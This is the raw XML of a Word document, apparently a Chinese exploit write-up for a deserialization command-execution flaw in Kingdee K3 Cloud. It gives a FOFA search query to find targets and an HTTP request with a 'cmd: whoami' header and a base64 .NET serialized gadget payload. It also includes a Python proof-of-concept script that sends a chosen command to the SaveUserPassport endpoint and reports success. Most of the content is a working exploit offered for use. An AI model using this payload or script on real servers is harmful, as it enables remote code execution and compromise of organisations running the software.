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金蝶云GetImportOutData存在反序列导致命令执行漏洞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app="Kingdee-K3-cloud"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0705" cy="2319655"/>
            <wp:effectExtent l="0" t="0" r="1333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/k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.InOutDataService.GetImportOutData.common.kdsvc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15651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yp.gzgszy.com:8088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text/plain, */*; q=0.01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x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36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text/json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cmd: whoami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p0":"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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AAwAAADgN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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3J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k+AAAACgk+AAAACVIAAAAGWwAAAAhHZXRU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eXBlcwoBRQAAAEMAAAAJWwAAAAk+AAAACVIAAAAGXgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGXwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgFGAAAAQgAAAAZgAAAAtgNTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJs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","format":"3"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0955" cy="2545080"/>
            <wp:effectExtent l="0" t="0" r="444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获取命令行参数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= sys.argv[1]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 = sys.argv[2]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构造请求头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url1 = url + "/K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc?dcInfo=11"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headers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'Accept': 'text/plain, */*; q=0.01',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'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36',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'Content-Type': 'text/json',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'Accept-Encoding': 'gzip, deflate',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'cmd': cmd,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'Accept-Language': 'zh-CN,zh;q=0.9',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构造请求数据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'{"ap0":"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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AAIODg4EIAEBAgMgAAIEIAASMQMgAA4IBwQSERIdDg4IAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAAuCYAAAAAAAAAAAAAziYAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAmAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAI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AAwAAADgN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QAAAAJIgAAABASAAAABwAAAAkEAAAACgkoAAAACggIAAAAAAoICAEAAAABEwAAAA8AAAAGKQAAAN8DU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LCBQdWJs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EAAAACSIAAAAQFAAAAAcAAAAJBQAAAAoJLAAAAAoICAAAAAAKCAgBAAAAARUAAAAPAAAABi0AAADmAlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3J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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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","format":"3"}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proxies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"http": "http://127.0.0.1:8080",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"https": "https://127.0.0.1:8080",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发送POST请求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= requests.post(url1, headers=headers, data=data, verify=False, timeout=10)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response_first_line = response.text.split('\n')[0]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输出响应内容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"authority" in response.text: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print("命令执行成功")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print("网页响应:" + response_first_line)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print("失败")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553710" cy="1390015"/>
            <wp:effectExtent l="0" t="0" r="8890" b="120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F1DCB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="061F1D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55C8093E"/>
    <w:rsid w:val="56A545B0"/>
    <w:rsid w:val="65E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2023-11-06T06:47:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T04:39:38Z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EE1308E82D59449CA0D25F1D3D48FE76_12</vt:lpwstr>
  </property>
</Properties>
</file>